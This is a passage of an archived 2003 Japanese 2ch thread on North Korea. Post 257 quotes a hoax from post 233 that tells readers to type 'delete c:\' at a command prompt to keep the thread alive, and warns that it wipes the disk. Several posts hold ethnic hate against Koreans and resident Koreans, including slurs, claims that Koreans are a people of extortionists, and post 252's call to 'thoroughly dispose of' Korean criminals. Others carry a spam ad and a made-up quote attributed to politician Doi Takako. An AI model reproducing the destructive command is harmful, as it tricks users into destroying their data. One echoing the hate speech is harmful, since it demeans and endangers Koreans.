これでDAT落ちを回避できます。


234 :名無しさん@お腹いっぱい。:03/06/02 19:55 ID:dF9XD9sS
http://news2.2ch.net/test/read.cgi/newsplus/1054547255/l50
政府が全滅を想定

235 :新潟市民:03/06/02 20:10 ID:P7BSl0K3
>>233
いまどきこんなのに引っかかるヤツはいないと思うが
一応突っ込んどく
>>233氏ね

236 :名無しさん@お腹いっぱい。:03/06/03 10:59 ID:3+ZxRbIx
みなさ〜ん。笑いたいときには、北朝鮮関連のニュースを見ましょう。あまりにも
ばかばかしくて、笑えます。お笑い北朝鮮。崩壊後はどんなギャグができるか
今から楽しみにしてます。

北朝鮮 金玉朝 
大小軍 金玉日との

237 :名無しさん@お腹いっぱい。:03/06/03 11:23 ID:y5pq70lK

【在日問題】の批判すら許されなかった【呪縛】から、ようやく【解き放たれた】日本。

戦後民主主義平和教育、人道的人権主義と言う「 美名 」のもと、
大陸、半島人の【奴隷】へと【洗脳教育】したエセ平和主義者ども、

エセ人権的人道支援の、ODA経済協力資金【たかり利権】に奔走した権力者ども。

     
日本民族の、誇り、自尊心を奪い取り、「大陸、半島人」に、へりくだり、
経済協力ODA資金「たかり利権」を獲得した、日本の支配権力者どもは、

まさしく、 【 売国奴 】




238 :名無しさん@お腹いっぱい。:03/06/03 11:31 ID:cpUHHGd7
>236
どんな漫才よりも、バラエティーよりも面白いもんな。
特番組んだら、視聴率取れると思うけどなあ。

239 :名無しさん@お腹いっぱい。:03/06/03 11:46 ID:k8lmWtX/
>>238
だから北朝鮮ドラマ半裸のなんとかは日本で最高視聴率だったじゃないか。
各局で放映された映像を編集したら完全版ができるぞ

240 :名無しさん@お腹いっぱい。:03/06/03 15:41 ID:5LHbFaoY
半裸のケツ♪

241 :名無しさん@お腹いっぱい。:03/06/03 16:54 ID:cpUHHGd7
>239
何だ、そりゃ。
全然知らん。
再放送ないかな。
ビデオでレンタルしてない??

242 :名無しさん@お腹いっぱい。:03/06/06 09:24 ID:PyM20NZz
北朝鮮が最も外貨をかせぐ方法は本国朝鮮中央テレビで放映したものを
海外に販売する事じゃないかなあ。

日本ならあのニュースを読むおばちゃんのヘアヌードが出るとか出ないで
話題になるかもしれんが(もちろん見たいわけじゃないよ)。

243 :_:03/06/06 09:30 ID:zab0vYp9
http://homepage.mac.com/hiroyuki43/moe/hankaku06.html

244 :名無しさん@お腹いっぱい。:03/06/06 09:39 ID:UBK3vhvV
怒りにも値しない



245 :名無しさん@お腹いっぱい。:03/06/06 10:00 ID:b3IbJk8k
☆☆☆ネット広告掲載で副収入!☆☆☆
http://look3.info/kurikuri/
PCでも携帯サイトでもOKです!いますぐ無料で作成できます。
よくあるあの「うざい広告」を貼り付けておくだけで
知らず知らずに収入になります。
PCの方は画面表示にそってお進みください。広告の説明をいたします。
⇒一番上の広告をクリックして出会い広告へ進んでください!
出会い広告をそのままクリックすれば広告説明の画面に移動します。
http://look2.info/kurikuri/
☆☆☆姉妹サイト携帯投稿専用↑もお楽しみください☆☆☆

246 :名無しさん@お腹いっぱい。:03/06/06 21:38 ID:8rYK22L6
ホーネッカー、チャウチェスク、サダム・・・。

かつて、訪問を受けて一緒に人民に向って手を振ったり、熱い握手をした同士は
全て権力の座から滑り落ちた。歴史の流れに抗う者は、粉砕されるのみ。

しかし、全体主義の国家って、双子かと思うくらい似てくるのが面白いね。
チャウチェスクの妻も、自分の気に入らないテレビ番組が流れていると
国営テレビ局に電話してプログラムを変えさせていたみたいだし。自分を
中心にしてしか物事を捉えられないのは、首領様そっくり。全部民族が違う
のに、国を治める手段が一緒っていうのが、この体制の救いようのなさを
示していると思う。

247 :謝罪しる@名無しさん:03/06/06 23:42 ID:HiH3ydUu

http://www2.gyojya.jp:8000/Flash/%90%d4%82%e7%82%b5%82%a2%92%a9.swf



248 :名無しさん@お腹いっぱい。:03/06/06 23:47 ID:cQYGMyb6
殺人予告スレ!!

在日医師こそ日本人をこらしめられるエリート
http://society.2ch.net/test/read.cgi/hosp/1002904514/l50


249 :名無しさん@お腹いっぱい。:03/06/07 00:29 ID:wIAOHVcW

在日・カルト宗教を批判すると、集団ストーカーされるかも知れないぞ!

あなたは毎日、いやがらせ・集団ストーカー・電磁波攻撃された事がありま

すか?

http://society.2ch.net/test/read.cgi/koumei/1053379222/-100

被害者、加害者、内部告発者も具体的にカキコして下さい。

又はコピペも貼り付けてください。
 
(注、今は騒いでいますよ)

250 :名無しさん@お腹いっぱい。:03/06/07 01:07 ID:Ue2jF71W
我が朝鮮人民軍は、朝鮮敵視政策をとる美帝国主義と、それに追随し、再びアジアを征服しようと野望を燃え立たせている日本帝国主義を打破し、また、美国の傀儡と化している南朝鮮反動分子どもをも抹殺する必要がある。
それを達成した時、我が朝鮮民族の悲願たる祖国統一を成し遂げることが出来るのである。

251 :名無しさん@お腹いっぱい。:03/06/07 01:18 ID:YUcnk3mw
 3年前の6月15日、金大中と金正日が会談し、
私は朝鮮半島の統一も近いと歓喜しました。
 昨年の6月13日、韓国でふたりの少女が在韓米軍の装甲車(戦車)
で無惨にも轢き殺されました。

 そして今日、この国で有事法制が成立しました。
大反対運動が起こるわけでもなく、
自民・民主の談合政治によって国会の圧倒的多数の賛成で可決されました。
 時代は日々悪くなっていると実感します。
アメリカ大帝国の剥き出しの暴力と、
日本の「鵺のような全体主義」が同時進行するのは、偶然ではないはずです。
今後古くて新しい帝国主義の時代を目の当たりにするのでしょう。
我が家をバラバラにしかねない、
個人をまったく尊重しない嗜虐的な帝国主義の時代を。。

http://hpmboard2.nifty.com/cgi-bin/bbs_by_date.cgi?user_id=QYW11772

252 :名無しさん@お腹いっぱい。:03/06/07 03:51 ID:gs4mslz1

【拉致事件が日本人と日本社会に残したものは?】
日本社会における「朝鮮人・朝鮮人社会・朝鮮人犯罪・日本名を名乗って起こす朝鮮人の犯罪」
これらを批判する 「タブー」 が音を立てて崩れ・日本人と日本社会が『いわれなきタブー』から開放された。
タブーの陰に隠れて「犯罪の限りを尽くした全ての朝鮮人」を白日の下に曝し、徹底的に処分しよう!!!
日本もやっと、「臭い物に、臭いと言える。」普通の国になれそうな明るい予感がする。もう一息だ。!


253 :名無しさん@お腹いっぱい。:03/06/07 03:53 ID:iy0AChgR
【 12月1日金奎一氏講演】
ーーー大韓民国が、大いに日朝交渉やってくれ、大いにがんばって仲良くしてくれ
おれたちはまあ36年前、いろいろあってろくろく金を取ることができなかったから、
その分まで取ってくれよ、ということを言って励ましているわけですから・・・。
だからこれ(朝日交渉)が、できるようになったんですよ。
これが時代の変化だということです。ーーー

ようするに、朝鮮人たちはどんな事をしても、日本から金を毟り取ろうという点で
同一民族としての共通の目標・共通の目的をもっている。あらゆる場面で共犯者として助け合っている。

「日本が早く援助しないと、北が暴走する。」 と韓国が煽って、早く金をださせようとしている。
双子のように連携プレーの取れる民族だ。阿吽(あうん)の呼吸だ。!感心した。!お見事。!

北朝鮮・韓国に関わるということは、性質の悪い人間(ヤクザ)に追突したようなもので
死ぬまで首が痛い(働けない)と難癖をつけ、たかり続ける脅迫者と一緒で、一生終わることのない
賠償(恐喝)問題を抱えることになる。韓国・北朝鮮は同じ穴の狢(むじな)。


254 :名無しさん@お腹いっぱい。:03/06/07 03:55 ID:9cgfVN5h

がんこに平和・有事法制反対・専守防衛・イージス艦派遣反対・ ダメなものはダメ

「 朝鮮労働党の意に反することは全てダメ」 土井 たか子


255 :名無しさん@お腹いっぱい。:03/06/07 03:56 ID:W78UKAUF

「私が平和憲法・護憲と云い続けるのは、北朝鮮の軍事的脅威や核開発に対して
日本政府を脅して、北朝鮮に米や金を支援させるための手段として、平和憲法と言い続けてるの」
土井 たか子


256 :名無しさん@お腹いっぱい。:03/06/07 04:57 ID:Ydb9qFjf
マドンナ・土井ババアは、有事関連法案の成立を受けて、
新しい戦前が始まった、といっていた。
オババの耳には軍歌の足音が聞こえているらしい。
不思議なことに、北鮮の軍歌の足音は聞こえないようだ。
もう、耄碌して耳が遠くなり、おまけに耳鳴りもしているらしい。

257 :・・・・・:03/06/07 05:45 ID:132PipVZ
>>233
> スレッドがすぐDAT落ちしてお困りのあなた
> DAT落ちしないようにする裏技です。
> 直接2chの鯖にアクセスして、DAT落ちのない領域にこのスレを移動しますので。ちょっと難しいですが。。
> 1(98)「スタート」→「プログラム」→「DOSプロンプト」を選択
>  (2000、XP)「スタート」→「プログラム」→「アクセサリ」
>   →「コマンドプロンプト」を選択
> 2 "C:\windows>"に続けて「cd c:\」と入力
> 3 "C:>"に続けて「delete c:\」と入力
> これでDAT落ちを回避できます。

こら!
ハードディスクがフォーマットされてしまうぞ。
絶対やるな!

こいつは工作員かも

258 :名無しさん@お腹いっぱい。:03/06/08 12:11 ID:qv7GBUss
北朝鮮がなにを言おうがまったく関心がない。日本からお恵みをもらわないと
生きていけない生産力のない国家だから。乞食だね。乞食国家北朝鮮。
自国の国民の生命すら維持できない存在する必要も価値もない国家。早く崩壊
してくれると助かる。金豚の顔をみるだけでむかむかする。

259 :名無しさん@お腹いっぱい。:03/06/10 10:11 ID:lW5dn83R
金玉日のことを金豚というらしいが、鹿児島の黒豚がかわいそうだ。あんなみっとも
ないヤツと同類と思われたくないだろう。

260 :名無しさん@お腹いっぱい。:03/06/10 16:15 ID:fq/YdVqW
北朝鮮は、米が核を使わないと思ってはったり外交

アメリカは、通常核が使えない兵器であること、地域紛争の解決には通常核戦力は無力であると再認識

アメリカ、小型核の開発開始、実用化。

北朝鮮が核保有宣言

アメリカ、北朝鮮に小型核による攻撃開始、第二次朝鮮戦争勃発

日本・韓国にも北の核攻撃があり、甚大な被害

北朝鮮、武装解除

その後、世界の核拡散が加速

。・゚・(ノД‘)・゚・。

261 :260:03/06/10 16:21 ID:fq/YdVqW
追加訂正
北朝鮮が核保有宣言→北朝鮮が再度核保有宣言、核実験に成功




262 :名無しさん@お腹いっぱい。:03/06/10 17:21 ID:cneHx9UT
まあ、こういう内部説明が成り立つ国が存在するってのも凄いことではあるな〜。
民度の低さを維持させてきた実力(笑)は尊敬するよ。

263 :名無しさん@お腹いっぱい。:03/06/10 20:51 ID:5JLSbt1W
>>233
お前は金ブタと同じ…っちゅ〜か、仲間か?

264 :名無しさん@お腹いっぱい。:03/06/20 00:37 ID:ZWlP5fx4
http://news.goo.ne.jp/news/reuters/kokusai/20030619/JAPAN-117631.html
敵国の発言

265 :名無しさん@お腹いっぱい。:03/06/20 11:01 ID:T8tCIheV
小泉の平壌訪問は、日本の北朝鮮脅威論を決定的にし。
日本を対朝強硬論に走らせた。
北朝鮮にとっては外交的な失敗だったって、海外メディアは評価は一致しているのだが。。

266 :名無しさん@お腹いっぱい。:03/06/20 11:17 ID:dSZbbuS/
>>263
>>233は北チョンが育成したサーバテロ集団と思われ。

267 :名無しさん@お腹いっぱい。:03/06/20 13:20 ID:dx6tjHeO
「朝鮮敵視政策に執ようにしがみついてきた日本帝国主義の頭目が頭を垂れて
 訪ねてきた」
・・・・・・確か東シナ海で北チョンの工作船を大日本国海上保安庁の巡視船が撃沈した事件について
「日本帝国主義による陰謀であり、我が共和国を陥れようとするものである!!これはサムライに現代版テロだ!!」
とか言ってたんだよね。

268 :名無しさん@お腹いっぱい。:03/06/20 13:31 ID:N2sM+t2i
なんでも都合のいいことばっかり言って見てるこっちが恥ずかしい。

269 :名無しさん@お腹いっぱい。:03/06/20 13:33 ID:yiwWaPVd
          _
      _,,-―''   ヽ、
     /     ヾ   ヽ、
   /      彡ノヽ    ヽ
   /  ,,ノ-~  ̄  ヽ     |
   |  / へ , 、 ノヾ \ミ  ノ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   /彡| ノ   ヽ    |   ) |  いったいどこの国が
   ヽ .|   、_っ      |  ノ | 日本に攻めてくるというのでしょうか?
   `-|  /  _  ヽ   |_ノ ∠  
      .|  ノ`-´\   |    \____________
     ヽ'  ⌒  丶 丿
       ,ー - ― '、
     /|ヽ___ノ|ヽ、





73 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)